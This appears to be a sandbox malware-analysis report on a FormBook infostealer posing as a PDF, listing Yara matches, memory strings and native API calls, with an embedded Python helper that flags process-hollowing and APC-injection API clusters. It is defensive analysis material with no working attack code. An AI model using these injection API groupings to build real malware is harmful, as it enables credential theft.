Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: ipconfig.exe, 00000010.00000002.909460899.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=%22xinghai-nb.com%22
Source: ipconfig.exe, 00000010.00000002.909460899.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: https://www.sogou.com/web?query=%22xinghai-nb.com%22&ie=utf8
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.680653424.00000000015D8000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00419D60 NtCreateFile
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00419E10 NtReadFile
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00419E90 NtClose
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00419F40 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00419D5E NtCreateFile
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00419E8C NtClose
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00419F3A NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015799A0 NtCreateSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579840 NtDelayExecution, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015798F0 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579A50 NtCreateFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579A00 NtProtectVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579A20 NtResumeThread, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579540 NtReadFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015795D0 NtClose, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015797A0 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015796E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579950 NtQueueApcThread
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015799D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0157B040 NtSuspendThread
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579820 NtEnumerateKey
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015798A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579B00 NtSetValueKey
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0157A3B0 NtGetContextThread
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579A10 NtQuerySection
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579560 NtWriteFile
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0157AD30 NtSetContextThread
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015795F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0157A770 NtOpenThread
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579770 NtSetInformationFile
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579760 NtOpenProcess
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0157A710 NtOpenProcessToken
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579FE0 NtCreateMutant
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579650 NtQueryValueKey
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015796D0 NtCreateKey
Source: C:\Windows\explorer.exe | Code function: 10_2_04DFAA32 NtCreateFile
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9FE0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9A50 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B96E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B96D0 NtCreateKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9540 NtReadFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B99A0 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B95D0 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9840 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9B00 NtSetValueKey
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032BA710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9760 NtOpenProcess
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9770 NtSetInformationFile
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032BA770 NtOpenThread
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032BA3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9A20 NtResumeThread
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9A10 NtQuerySection
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9660 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9650 NtQueryValueKey
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032BAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9560 NtWriteFile
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B95F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9820 NtEnumerateKey
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032BB040 NtSuspendThread
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B98F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A19D60 NtCreateFile
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A19E90 NtClose
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A19E10 NtReadFile
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A19D5E NtCreateFile
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A19E8C NtClose
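The native-call rows above list, per process, every Nt* stub the disassembler resolved, which is what backs the "process hollowing", "queues an APC" and "maps a DLL or memory area into another process" signatures in the overview. The Python below is an added triage example, not part of the Joe Sandbox report: it parses such rows, groups the callees by pid, and reports which injection-related API clusters each process contains in full. The API groupings (TECHNIQUES) are this example's own assumption about which calls belong together, and the sample rows are a constructed subset copied from the listing above, one of them kept in the raw fused form the export produces (path glued to "Code function:" and the address tag repeated after the last callee).

```python
"""Triage helper: group sandbox 'Code function' rows by process and check which
native-API clusters typical of code injection each process contains."""
import re
from collections import defaultdict

# API clusters that together point at one injection technique. The grouping is
# this example's own assumption for triage, not a classification made by the sandbox.
TECHNIQUES = {
    "process_hollowing": frozenset(
        {"NtUnmapViewOfSection", "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread"}),
    "apc_injection": frozenset(
        {"NtOpenProcess", "NtWriteVirtualMemory", "NtQueueApcThread"}),
    "section_mapping": frozenset(
        {"NtCreateSection", "NtMapViewOfSection"}),
}

# One row: "<source path> [|] Code function: <pid>_<run>_<hex addr> <callee>[,<callee>...]".
# The raw export fuses the path to "Code function:" and repeats the address tag after
# the last callee; both forms are accepted and the repeated tag is dropped.
ROW_RE = re.compile(
    r"^(?:Source:\s*)?(?P<proc>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]{8})\s+(?P<callees>[A-Za-z0-9_,\s]+?)\s*$")
ADDR_TAG_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]{8}$")


def parse_rows(text):
    """Yield (pid, process, address, callees) for every parsable row; skip the rest."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        callees = [c.strip() for c in m["callees"].split(",")]
        callees = [c for c in callees if c and not ADDR_TAG_RE.match(c)]
        yield int(m["pid"]), m["proc"].strip(), int(m["addr"], 16), callees


def injection_coverage(text):
    """Per pid: process name, the set of callees seen, and the techniques whose
    whole API cluster is present (sorted by name)."""
    per_pid = defaultdict(lambda: {"process": None, "calls": set()})
    for pid, proc, _addr, callees in parse_rows(text):
        per_pid[pid]["process"] = proc
        per_pid[pid]["calls"].update(callees)
    for info in per_pid.values():
        info["techniques"] = sorted(
            name for name, apis in TECHNIQUES.items() if apis <= info["calls"])
    return dict(per_pid)


def missing_apis(text, pid, technique):
    """APIs of one cluster that a process lacks; shows how close a partial match is."""
    calls = injection_coverage(text).get(pid, {}).get("calls", set())
    return sorted(TECHNIQUES[technique] - calls)


# Constructed sample: a subset of rows copied from the report, first one in raw fused form.
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_00419D60 NtCreateFile,9_2_00419D60
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015799D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015799A0 NtCreateSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015797A0 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015798A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0157AD30 NtSetContextThread
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579A20 NtResumeThread, LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579950 NtQueueApcThread
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01579760 NtOpenProcess
Source: C:\Windows\explorer.exe | Code function: 10_2_04DFAA32 NtCreateFile
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032BAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9A20 NtResumeThread
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B9950 NtQueueApcThread
"""

if __name__ == "__main__":
    for pid, info in sorted(injection_coverage(SAMPLE_ROWS).items()):
        print(pid, info["process"], info["techniques"] or "no full cluster")
```

On the sample, pid 9 (the unpacked FormBook payload) covers all three clusters, explorer.exe (pid 10) covers none, and the ipconfig.exe subset covers only process hollowing; `missing_apis(SAMPLE_ROWS, 16, "apc_injection")` names NtOpenProcess as the one call absent from that subset. Callees such as LdrInitializeThunk stay in the per-process call set but belong to no cluster, so they never produce a match on their own.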
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01592140
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01590470
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01590FD0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_0159EE68
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01593078
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01591779
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_0159BF40
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01594AD8
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01594AC9
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01592F78
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01590F72
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01590F29
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01590ED1
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01595148
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01595139
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01595359
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01595368
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01595610
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01595600
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01593F48
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_01593F38
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_0159BF30
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_05673794
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_05679BC0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_056701F0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_056737E7
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_05673788
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00401029
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00401030
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00402D87
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00402D90
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00409E40
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00409E3B
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00402FB0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0153F900
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01554120
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0160E824
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015F1002
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_016028EC
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0154B090
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_016020A8
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015620A0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01602B28
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015FDBD2
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0156EBB0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_016022AE
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01601D55
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01602D07
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01530D20
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0154D5E0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_016025DD
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01562581
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015FD466
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0154841F
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01601FF1
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015FD616
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01556E30
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01602EF7
Source: C:\Windows\explorer.exe | Code function: 10_2_04DFAA32
Source: C:\Windows\explorer.exe | Code function: 10_2_04DF2CF2
Source: C:\Windows\explorer.exe | Code function: 10_2_04DF2CEC
Source: C:\Windows\explorer.exe | Code function: 10_2_04DF1072
Source: C:\Windows\explorer.exe | Code function: 10_2_04DFDA6F
Source: C:\Windows\explorer.exe | Code function: 10_2_04DF1069
Source: C:\Windows\explorer.exe | Code function: 10_2_04DF9862
Source: C:\Windows\explorer.exe | Code function: 10_2_04DF5B1F
Source: C:\Windows\explorer.exe | Code function: 10_2_04DFDB0E
Source: C:\Windows\explorer.exe | Code function: 10_2_04DF8132
Source: C:\Windows\explorer.exe | Code function: 10_2_04DF5B22
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03342B28
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032AEBB0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03341FF1
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0333DBD2
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03296E30
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_033422AE
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03342EF7
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03270D20
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03294120
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327F900
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03342D07
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03341D55
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A2581
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0328D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331002
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0328841F
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A20A0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_033420A8
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0328B090
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A02D87
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A02D90
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A09E3B
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A09E40
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A02FB0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 0327B150 appears 35 times
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: String function: 0153B150 appears 35 times
Source: INQUIRY 1820521 pdf.exe | Binary or memory string: OriginalFilename vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.688381627.000000000A140000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.688381627.000000000A140000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs INQUIRY 1820521 pdf.exe
